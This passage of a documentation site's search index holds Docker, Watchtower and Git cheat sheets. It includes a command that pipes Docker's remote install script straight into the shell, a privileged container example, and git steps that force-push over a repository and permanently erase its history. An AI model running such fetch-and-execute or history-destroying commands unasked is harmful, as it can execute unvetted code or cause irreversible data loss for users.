", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#removing-containers", "title": "Removing Containers", "text": "docker rm <container_id>\n
force remove
docker rm -f <container_id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#find-container-ip-address", "title": "Find Container IP Address", "text": "docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container name/id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#copy-files-into-docker-container", "title": "Copy Files into Docker Container", "text": "docker cp <local file> <container name/id>:<remote file>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#copy-files-from-docker-container", "title": "Copy Files from Docker Container", "text": "docker cp <container name/id>:<remote file> <local file>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#purging", "title": "Purging", "text": "Purging All Unused or Dangling Images, Containers, Volumes, and Networks Docker provides a single command that will clean up any resources \u2014 images, containers, volumes, and networks \u2014 that are dangling (not associated with a container):
docker system prune\n
To additionally remove any stopped containers and all unused images (not just dangling images), add the -a flag to the command:
docker system prune -a\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#monitor-system-resource-utilization-for-running-containers", "title": "Monitor System Resource Utilization for Running Containers", "text": "To check the CPU, memory, and network I/O usage of a single container, you can use:
docker stats <container>\n
For all containers listed by ID:
docker stats $(docker ps -q)\n
For all containers listed by name:
docker stats $(docker ps --format '{{.Names}}')\n
For all containers listed by image:
docker ps -a -f ancestor=ubuntu\n
Remove all untagged images:
docker rmi $(docker images | grep \u201c^\u201d | awk '{split($0,a,\" \"); print a[3]}')\n
Remove container by a regular expression:
docker ps -a | grep wildfly | awk '{print $1}' | xargs docker rm -f\n
Remove all exited containers:
docker rm -f $(docker ps -a | grep Exit | awk '{ print $1 }')\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/", "title": "Docker Containers Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#whats-a-docker-container", "title": "What's a Docker Container?", "text": "A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#containers", "title": "Containers", "text": "Your basic isolated Docker process. Containers are to Virtual Machines as threads are to processes. Or you can think of them as chroots on steroids.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#lifecycle", "title": "Lifecycle", "text": " docker create
creates a container but does not start it. docker rename
allows the container to be renamed. docker run
creates and starts a container in one operation. docker rm
deletes a container. docker update
updates a container's resource limits. Normally if you run a container without options it will start and stop immediately, if you want to keep it running you can use the command, docker run -td container_id
this will use the option -t
that will allocate a pseudo-TTY session and -d
that will detach automatically the container (run container in background and print container ID).
If you want a transient container, docker run --rm
will remove the container after it stops.
If you want to map a directory on the host to a docker container, docker run -v $HOSTDIR:$DOCKERDIR
. Also see Volumes.
If you want to remove also the volumes associated with the container, the deletion of the container must include the -v
switch like in docker rm -v
.
There's also a logging driver available for individual containers in docker 1.10. To run docker with a custom log driver (i.e., to syslog), use docker run --log-driver=syslog
.
Another useful option is docker run --name yourname docker_image
because when you specify the --name
inside the run command this will allow you to start and stop a container by calling it with the name that you specified when you created it.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#starting-and-stopping", "title": "Starting and Stopping", "text": " docker start
starts a container so it is running. docker stop
stops a running container. docker restart
stops and starts a container. docker pause
pauses a running container, \"freezing\" it in place. docker unpause
will unpause a running container. docker wait
blocks until running container stops. docker kill
sends a SIGKILL to a running container. docker attach
will connect to a running container. If you want to detach from a running container, use Ctrl + p, Ctrl + q
. If you want to integrate a container with a host process manager, start the daemon with -r=false
then use docker start -a
.
If you want to expose container ports through the host, see the exposing ports section.
Restart policies on crashed docker instances are covered here.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#cpu-constraints", "title": "CPU Constraints", "text": "You can limit CPU, either using a percentage of all CPUs, or by using specific cores.
For example, you can tell the cpu-shares
setting. The setting is a bit strange -- 1024 means 100% of the CPU, so if you want the container to take 50% of all CPU cores, you should specify 512. See https://goldmann.pl/blog/2014/09/11/resource-management-in-docker/#_cpu for more:
docker run -it -c 512 agileek/cpuset-test\n
You can also only use some CPU cores using cpuset-cpus
. See https://agileek.github.io/docker/2014/08/06/docker-cpuset/ for details and some nice videos:
docker run -it --cpuset-cpus=0,4,6 agileek/cpuset-test\n
Note that Docker can still see all of the CPUs inside the container -- it just isn't using all of them. See https://github.com/docker/docker/issues/20770 for more details.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#memory-constraints", "title": "Memory Constraints", "text": "You can also set memory constraints on Docker:
docker run -it -m 300M ubuntu:14.04 /bin/bash\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#capabilities", "title": "Capabilities", "text": "Linux capabilities can be set by using cap-add
and cap-drop
. See https://docs.docker.com/engine/reference/run/#/runtime-privilege-and-linux-capabilities for details. This should be used for greater security.
To mount a FUSE based filesystem, you need to combine both --cap-add and --device:
docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs\n
Give access to a single device:
docker run -it --device=/dev/ttyUSB0 debian bash\n
Give access to all devices:
docker run -it --privileged -v /dev/bus/usb:/dev/bus/usb debian bash\n
More info about privileged containers here.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#info", "title": "Info", "text": " docker ps
shows running containers. docker logs
gets logs from container. (You can use a custom log driver, but logs is only available for json-file
and journald
in 1.10). docker inspect
looks at all the info on a container (including IP address). docker events
gets events from container. docker port
shows public facing port of container. docker top
shows running processes in container. docker stats
shows containers' resource usage statistics. docker diff
shows changed files in the container's FS. docker ps -a
shows running and stopped containers.
docker stats --all
shows a list of all containers, default shows just running.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#import-export", "title": "Import / Export", "text": " docker cp
copies files or folders between a container and the local filesystem. docker export
turns container filesystem into tarball archive stream to STDOUT. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#executing-commands", "title": "Executing Commands", "text": " docker exec
to execute a command in container. To enter a running container, attach a new shell process to a running container called foo, use: docker exec -it foo /bin/bash
.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/", "title": "Docker Images Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#whats-a-docker-image", "title": "What's a Docker Image?", "text": "A Docker image is a file used to execute code in a Docker container. Docker images act as a set of instructions to build a Docker container, like a template. Docker images also act as the starting point when using Docker. An image is comparable to a snapshot in virtual machine (VM) environments.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#images", "title": "Images", "text": "Images are just templates for docker containers.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#lifecycle", "title": "Lifecycle", "text": " docker images
shows all images. docker import
creates an image from a tarball. docker build
creates image from Dockerfile. docker commit
creates image from a container, pausing it temporarily if it is running. docker rmi
removes an image. docker load
loads an image from a tar archive as STDIN, including images and tags (as of 0.7). docker save
saves an image to a tar archive stream to STDOUT with all parent layers, tags & versions (as of 0.7). ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#info", "title": "Info", "text": " docker history
shows history of image. docker tag
tags an image to a name (local or registry). ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#cleaning-up", "title": "Cleaning up", "text": "While you can use the docker rmi
command to remove specific images, there's a tool called docker-gc that will safely clean up images that are no longer used by any containers. As of docker 1.13, docker image prune
is also available for removing unused images. See Prune.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#loadsave-image", "title": "Load/Save image", "text": "Load an image from file:
docker load < my_image.tar.gz\n
Save an existing image:
docker save my_image:my_tag | gzip > my_image.tar.gz\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#importexport-container", "title": "Import/Export container", "text": "Import a container as an image from file:
cat my_container.tar.gz | docker import - my_image:my_tag\n
Export an existing container:
docker export my_container | gzip > my_container.tar.gz\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#difference-between-loading-a-saved-image-and-importing-an-exported-container-as-an-image", "title": "Difference between loading a saved image and importing an exported container as an image", "text": "Loading an image using the load
command creates a new image including its history. Importing a container as an image using the import
command creates a new image excluding the history which results in a smaller image size compared to loading an image.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/", "title": "Docker Installation", "text": "You can download and install Docker on multiple platforms. The following are the most common ways to install Docker on Linux, Mac, and Windows. You can also install Docker on other platforms if you have the necessary software.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#images", "title": "Images", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#linux", "title": "Linux", "text": "Run this quick and easy install script provided by Docker:
curl -sSL https://get.docker.com/ | sh\n
If you're not willing to run a random shell script, please see the installation instructions for your distribution.
If you are a complete Docker newbie, you should follow the series of tutorials now.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#macos", "title": "macOS", "text": "Download and install Docker Community Edition. if you have Homebrew-Cask, just type brew install --cask docker
. Or Download and install Docker Toolbox. Docker For Mac is nice, but it's not quite as finished as the VirtualBox install. See the comparison.
NOTE Docker Toolbox is legacy. You should use Docker Community Edition. See Docker Toolbox.
Once you've installed Docker Community Edition, click the docker icon in Launchpad. Then start up a container:
docker run hello-world\n
That's it, you have a running Docker container.
If you are a complete Docker newbie, you should probably follow the series of tutorials now.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#windows-10", "title": "Windows 10", "text": "Instructions to install Docker Desktop for Windows can be found here
Once installed, open powershell as administrator and run:
# Display the version of docker installed:\ndocker version\n\n# Pull, create, and run 'hello-world':\ndocker run hello-world\n
To continue with this cheat sheet, right click the Docker icon in the system tray, and go to settings. In order to mount volumes, the C:/ drive will need to be enabled in the settings so that information can be passed into the containers (later described in this article).
To switch between Windows containers and Linux containers, right click the icon in the system tray and click the button to switch container operating system. Doing this will stop the current containers that are running, and make them inaccessible until the container OS is switched back.
Additionally, if you have WSL or WSL2 installed on your desktop, you might want to install the Linux Kernel for Windows. Instructions can be found here. This requires the Windows Subsystem for Linux feature. This will allow for containers to be accessed by WSL operating systems, as well as the efficiency gain from running WSL operating systems in docker. It is also preferred to use Windows terminal for this.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#windows-server-2016-2019", "title": "Windows Server 2016 / 2019", "text": "Follow Microsoft's instructions that can be found here
If using the latest edge version of 2019, be prepared to only work in powershell, as it is only a servercore image (no desktop interface). When starting this machine, it will login and go straight to a powershell window. It is recommended to install text editors and other tools using Chocolatey.
After installing, these commands will work:
# Display the version of docker installed:\ndocker version\n\n# Pull, create, and run 'hello-world':\ndocker run hello-world\n
Windows Server 2016 is not able to run Linux images.
Windows Server Build 2004 is capable of running both linux and windows containers simultaneously through Hyper-V isolation. When running containers, use the --isolation=hyperv
command, which will isolate the container using a separate kernel instance.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#check-version", "title": "Check Version", "text": "It is very important that you always know the current version of Docker you are currently running on at any point in time. This is very helpful because you get to know what features are compatible with what you have running. This is also important because you know what containers to run from the docker store when you are trying to get template containers. That said let see how to know which version of docker we have running currently.
docker version
shows which version of docker you have running. Get the server version:
$ docker version --format '{{.Server.Version}}'\n1.8.0\n
You can also dump raw JSON data:
$ docker version --format '{{json .}}'\n{\"Client\":{\"Version\":\"1.8.0\",\"ApiVersion\":\"1.20\",\"GitCommit\":\"f5bae0a\",\"GoVersion\":\"go1.4.2\",\"Os\":\"linux\",\"Arch\":\"am\"}\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/", "title": "Docker Networks & Links Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#networks", "title": "Networks", "text": "Docker has a networks feature. Docker automatically creates 3 network interfaces when you install it (bridge, host none). A new container is launched into the bridge network by default. To enable communication between multiple containers, you can create a new network and launch containers in it. This enables containers to communicate to each other while being isolated from containers that are not connected to the network. Furthermore, it allows to map container names to their IP addresses. See working with networks for more details.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#lifecycle", "title": "Lifecycle", "text": " docker network create
NAME Create a new network (default type: bridge). docker network rm
NAME Remove one or more networks by name or identifier. No containers can be connected to the network when deleting it. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#info", "title": "Info", "text": " docker network ls
List networks docker network inspect
NAME Display detailed information on one or more networks. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#connection", "title": "Connection", "text": " docker network connect
NETWORK CONTAINER Connect a container to a network docker network disconnect
NETWORK CONTAINER Disconnect a container from a network You can specify a specific IP address for a container:
# create a new bridge network with your subnet and gateway for your ip block\ndocker network create --subnet 203.0.113.0/24 --gateway 203.0.113.254 iptastic\n\n# run a nginx container with a specific ip in that block\n$ docker run --rm -it --net iptastic --ip 203.0.113.2 nginx\n\n# curl the ip from any other place (assuming this is a public ip block duh)\n$ curl 203.0.113.2\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#links", "title": "Links", "text": "Links are how Docker containers talk to each other through TCP/IP ports. Atlassian show worked examples. You can also resolve links by hostname.
This has been deprecated to some extent by user-defined networks.
NOTE: If you want containers to ONLY communicate with each other through links, start the docker daemon with -icc=false
to disable inter process communication.
If you have a container with the name CONTAINER (specified by docker run --name CONTAINER
) and in the Dockerfile, it has an exposed port:
EXPOSE 1337\n
Then if we create another container called LINKED like so:
docker run -d --link CONTAINER:ALIAS --name LINKED user/wordpress\n
Then the exposed ports and aliases of CONTAINER will show up in LINKED with the following environment variables:
$ALIAS_PORT_1337_TCP_PORT\n$ALIAS_PORT_1337_TCP_ADDR\n
And you can connect to it that way.
To delete links, use docker rm --link
.
Generally, linking between docker services is a subset of \"service discovery\", a big problem if you're planning to use Docker at scale in production. Please read The Docker Ecosystem: Service Discovery and Distributed Configuration Stores for more info.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/", "title": "Docker Security & Best Practices", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security", "title": "Security", "text": "This is where security tips about Docker go. The Docker security page goes into more detail.
First things first: Docker runs as root. If you are in the docker
group, you effectively have root access. If you expose the docker unix socket to a container, you are giving the container root access to the host.
Docker should not be your only defense. You should secure and harden it.
For an understanding of what containers leave exposed, you should read Understanding and Hardening Linux Containers by Aaron Grattafiori. This is a complete and comprehensive guide to the issues involved with containers, with a plethora of links and footnotes leading on to yet more useful content. The security tips following are useful if you've already hardened containers in the past, but are not a substitute for understanding.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-tips", "title": "Security Tips", "text": "For greatest security, you want to run Docker inside a virtual machine. This is straight from the Docker Security Team Lead -- slides / notes. Then, run with AppArmor / seccomp / SELinux / grsec etc to limit the container permissions. See the Docker 1.10 security features for more details.
Docker image ids are sensitive information and should not be exposed to the outside world. Treat them like passwords.
See the Docker Security Cheat Sheet by Thomas Sj\u00f6gren: some good stuff about container hardening in there.
Check out the docker bench security script, download the white papers.
Snyk's 10 Docker Image Security Best Practices cheat sheet
You should start off by using a kernel with unstable patches for grsecurity / pax compiled in, such as Alpine Linux. If you are using grsecurity in production, you should spring for commercial support for the stable patches, same as you would do for RedHat. It's $200 a month, which is nothing to your devops budget.
Since docker 1.11 you can easily limit the number of active processes running inside a container to prevent fork bombs. This requires a linux kernel >= 4.3 with CGROUP_PIDS=y to be in the kernel configuration.
docker run --pids-limit=64\n
Also available since docker 1.11 is the ability to prevent processes from gaining new privileges. This feature have been in the linux kernel since version 3.5. You can read more about it in this blog post.
docker run --security-opt=no-new-privileges\n
From the Docker Security Cheat Sheet (it's in PDF which makes it hard to use, so copying below) by Container Solutions:
Turn off interprocess communication with:
docker -d --icc=false --iptables\n
Set the container to be read-only:
docker run --read-only\n
Verify images with a hashsum:
docker pull debian@sha256:a25306f3850e1bd44541976aa7b5fd0a29be\n
Set volumes to be read only:
docker run -v $(pwd)/secrets:/secrets:ro debian\n
Define and run a user in your Dockerfile so you don't run as root inside the container:
RUN groupadd -r user && useradd -r -g user user\nUSER user\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#user-namespaces", "title": "User Namespaces", "text": "There's also work on user namespaces -- it is in 1.10 but is not enabled by default.
To enable user namespaces (\"remap the userns\") in Ubuntu 15.10, follow the blog example.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-videos", "title": "Security Videos", "text": " Using Docker Safely Securing your applications using Docker Container security: Do containers actually contain? Linux Containers: Future or Fantasy? ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-roadmap", "title": "Security Roadmap", "text": "The Docker roadmap talks about seccomp support. There is an AppArmor policy generator called bane, and they're working on security profiles.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#best-practices", "title": "Best Practices", "text": "This is where general Docker best practices and war stories go:
The Rabbit Hole of Using Docker in Automated Tests Bridget Kromhout has a useful blog post on running Docker in production at Dramafever. There's also a best practices blog post from Lyst. Building a Development Environment With Docker Discourse in a Docker Container ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/watchtower/", "title": "Watchtower", "text": "", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#quick-start", "title": "Quick Start", "text": "With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially. Run the watchtower container with the following command:
docker rundocker-compose.yml $ docker run -d \\\n--name watchtower \\\n-v /var/run/docker.sock:/var/run/docker.sock \\\ncontainrrr/watchtower\n
version: \"3\"\nservices:\nwatchtower:\nimage: containrrr/watchtower\nvolumes:\n- /var/run/docker.sock:/var/run/docker.sock\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#what-is-watchtower", "title": "What is Watchtower?", "text": "Watchtower is an application that will monitor your running Docker containers and watch for changes to the images that those containers were originally started from. If watchtower detects that an image has changed, it will automatically restart the container using the new image.
With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially.
Full documentation can be found at Watchtower Documentation. Github repo can be found at Watchtower Github Repository.
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#run-ones", "title": "Run Ones", "text": "You can run Watchtower run once
to force an update of containers by running the following command:
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock containrrr/watchtower --run-once\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#docker-compose-example", "title": "Docker Compose Example", "text": "Blow is and example of a docker-compose.yml file that uses watchtower to automatically update your running containers at 3:30 AM every day, sending notifications to Telegram
with shoutrrr
version: '3'\n\nservices:\nwatchtower:\nimage: containrrr/watchtower\ncontainer_name: watchtower\nhostname: port-watchtower\nrestart: always\nnetwork_mode: bridge\nvolumes:\n- /var/run/docker.sock:/var/run/docker.sock\n- /etc/localtime:/etc/localtime\nenvironment:\n- WATCHTOWER_NOTIFICATIONS=shoutrrr\n- WATCHTOWER_NOTIFICATION_URL=telegram://<Bot-api-token>@telegram/?channels=<channel-id>\ncommand: --schedule '0 30 3 * * *' --cleanup\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/git/delete-commit-history/", "title": "Removing Sensitive Data from a Repository History", "text": "As humans, we sometimes make mistakes. One of them is committing sensitive data in our Git repository. If you commit sensitive data, such as a password, SSH key, API tokens, license keys and so on into a Git repository, you can remove it from the history. You can follow the official GitHub instructions to remove sensitive data from the history. It's probably the best and the right way to do it.
Below is a fast way to remove sensitive data from a repository's history but with a few caveats like losing all the history of the repository.
", "tags": ["github", "history", "security"]}, {"location": "devops/git/delete-commit-history/#delete-commit-history-in-github-repository", "title": "Delete Commit History in Github Repository", "text": "Danger
This will remove your old commit history completely, You can\u2019t recover it again!
Create Orphan Branch \u2013 Create a new orphan branch in the git repository. The newly created branch will not show in the \u2018git branch\u2019 command.
git checkout --orphan temp_branch\n
Add Files to Branch \u2013 Now add all files to newly created branch and commit them using following commands.
git add -A\ngit commit -am \"first commit\"\n
Delete master/main Branch. Adjust the command according to your git repository
git branch -D main\n
Rename Current Branch \u2013 After deleting the master/main branch, let\u2019s rename newly created branch name to master/main.
git branch -m main\n
Push Changes \u2013 You have completed the changes to your local git repository. Finally, push your changes to the remote master/main (Github) repository forcefully.
git push -f origin main\n
", "tags": ["github", "history", "security"]}, {"location": "devops/git/git-cli-cheat-sheet/", "title": "Git Cli Cheat Sheet", "text": "Git is a free and open source distributed version control system designed to quickly and efficiently manage everything from small to very large projects.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#create-repositories", "title": "Create Repositories", "text": "A new repository can either be created locally, or an existing repository can be cloned. When a repository was initialized locally, you have to push it to GitHub afterwards.
The git init command turns an existing directory into a new Git repository inside the folder you are running this command. After using the git init
command, link the local repository to an empty GitHub repository using the following command:
git init\n
Specifies the remote repository for your local repository. The url points to a repository on GitHub.
git remote add origin [url]\n
Clone (download) a repository that already exists on GitHub, including all of the files, branches, and commits
git clone [url]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#git-configuration", "title": "Git Configuration", "text": "Configure user information for all local repositories
Sets the name you want attached to your commit transactions
git config --global user.name \"[name]\"\n
Sets the email you want attached to your commit transactions
git config --global user.email \"[email address]\"\n
Enables helpful colorization of command line output
git config --global color.ui auto\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#synchronize-changes", "title": "Synchronize Changes", "text": "Synchronize your local repository with the remote repository on GitHub.com
Downloads all history from the remote tracking branches
git fetch\n
Combines remote tracking branches into current local branch
git merge\n
Uploads all local branch commits to GitHub
git push\n
Updates your current local working branch with all new commits from the corresponding remote branch on GitHub. git pull
is a combination of git fetch
and git merge
git pull\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#redo-commits", "title": "Redo Commits", "text": "Erase mistakes and craft replacement history
Undoes all commits after [commit], preserving changes locally
git reset [commit]\n
If you don't want to reset absolutely, but relatively that is also possible using
git reset HEAD~2\n
which undoes the last 2 commits. Discards all history and changes back to the specified commit
git reset --hard [commit]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#branches", "title": "Branches", "text": "Branches are an important part of working with Git. Any commits you make will be made on the branch you\u2019re currently \u201cchecked out\u201d to. Use git status to see which branch that is.
Creates a new branch
git branch [branch-name]\n
Switches to the specified branch and updates the working directory
git switch -c [branch-name]\n
or you can use
git checkout -b [branch-name]\n
to both create and switch to the branch simultaneously. Combines the specified branch\u2019s history into the current branch. This is usually done in pull requests, but is an important Git operation.
git merge [branch]\n
Deletes the specified branch
git branch -d [branch-name]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#make-changes", "title": "Make Changes", "text": "Browse and inspect the evolution of project files
Lists version history for the current branch
git log\n
Lists version history for a file, beyond renames (works only for a single file)
git log --follow [file]\n
Shows content differences between two branches
git diff [first-branch]...[second-branch]\n
Outputs metadata and content changes of the specified commit
git show [commit]\n
Snapshots the file in preparation for versioning
git add [file]\n
Records file snapshots permanently in version history
git commit -m \"[descriptive message]\"\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#the-gitignore-file", "title": "The .gitignore file", "text": "Sometimes it may be a good idea to exclude files from being tracked with Git. This is typically done in a special file named .gitignore. You can find helpful templates for .gitignore
files at github.com/github/gitignore. If there are certain files (like .vscode
or .ide
) that should be excluded from all projects, you can create a global .gitignore
file to do so.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#untrack-files-already-added-to-git-repository-based-on-gitignore", "title": "Untrack Files Already Added to git Repository Based on .gitignore", "text": "Commit all your changes. Before proceeding, make sure all your changes are committed, including your .gitignore file. Remove everything from the repository. To clear your repo, use:
git rm -r --cached .\n
Re-add everything.
git add .\n
Commit.
git commit -m \".gitignore fix\"\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#use-gist-as-repository", "title": "Use Gist as Repository", "text": "It's probably easiest if you just start by cloning the gist, so that origin
(a \"remote\" that refers to the original repository) is set up for you. Then you can just do git push origin master
. For example:
git clone git@gist.github.com:869085.git mygist\ncd mygist\n
Add your changes to the repository.
git add .\ngit commit -m \"Better comments\"\ngit push origin master\n
However, if you don't want to redo your changes, you can do:
cd mygist\ngit remote add origin git@gist.github.com:869085.git\ngit fetch origin\n# Push your changes, also setting the upstream for master:\ngit push -u origin master\n
Strictly speaking, the git fetch origin
and -u
argument to git push origin master
are optional, but they will helpfully associate the upstream branch master
in origin
with your local branch master
.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-submodules/", "title": "Git Submodules Cheat Sheet", "text": "", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#what-is-a-submodule", "title": "What is a Submodule?", "text": "Git submodules allow you to keep a git repository as a subdirectory of another git repository. Git submodules are simply a reference to another repository at a particular snapshot in time. Git submodules enable a Git repository to incorporate and track version history of external code.
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#add-a-submodule", "title": "Add a Submodule", "text": "You need to know the remote git repository url and where you want to place that it in your repository.
for example:
git submodule add https://github.com/fire1ce/3os.org path/to/submodule\ngit add .\ngit commit -m \"adds submodule path/to/submodule\"\n
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#cloning-a-project-with-submodules", "title": "Cloning A Project With Submodules", "text": "When you clone a repository that contains submodules there are a few extra steps to be taken.
for example:
git clone https://github.com/fire1ce/3os.org repo\ncd repo\ngit submodule init\ngit submodule update\n
If you\u2019re sure you want to fetch all submodules (and their submodules), you can also use this fancy one-liner:
git clone --recurse-submodules https://github.com/fire1ce/3os.org\n
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#submodule-update", "title": "Submodule Update", "text": "If you\u2019re simply tracking the master
or main
branch for the submodule, you can suffice with a simple fetch
and merge
.
cd path/to/submodule\ngit fetch\ngit merge origin/master\n
If you\u2019re in a hurry, you can streamline this for all submodules in your repo with:
git submodule update --remote --recursive\n
Commit this change to your own repo, so others are locked to this new version of the submodule as well.
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#remove-a-submodule", "title": "Remove a submodule", "text": " Delete the relevant section from the .gitmodules
file. Stage the .gitmodules
changes git add .gitmodules
Delete the relevant section from .git/config
. Run git rm --cached path_to_submodule
(no trailing slash). Run rm -rf .git/modules/path_to_submodule
(no trailing slash). Commit git commit -m \"Removed submodule\"
Delete the now untracked submodule files rm -rf path_to_submodule
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/github-cli/", "title": "GitHub Cli Cheat Sheet", "text": "The GitHub Cli a is free and open source Cli tool to interact with GitHub repositories. It allows you to work solely from the command line, as well as navigate to remote (web) repositories very easily.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/github-cli/#installation", "title": "Installation", "text": "The GitHub Cli can be found at https://cli.github.com/. The installation is very straightforward, for example,
brew install gh\n
on macOS.", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/github-cli/#some-example-commands", "title": "Some example commands", "text": "View the repository remotely.
gh repo view --web\n
Create a pull request remotely.
gh pr create --web\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "homelab/devices/synology-nas/", "title": "Synology DS218+ NAS", "text": "One of the main devices in my HomeLab
is a Synology DS218+ NAS. Its purpose is mainly for backup and data synchronization tasks.
Synology DS218+ NAS was upgraded to 8GB of RAM. It has two SAMSUNG 870 QVO 4TB SSD, running in redundant mode. The 1GbE network was upgraded with SABRENT USB 5GbE Ethernet and the fan was replaced with Noctua NF-A9 FLX Fan for quieter operation.
Parts List
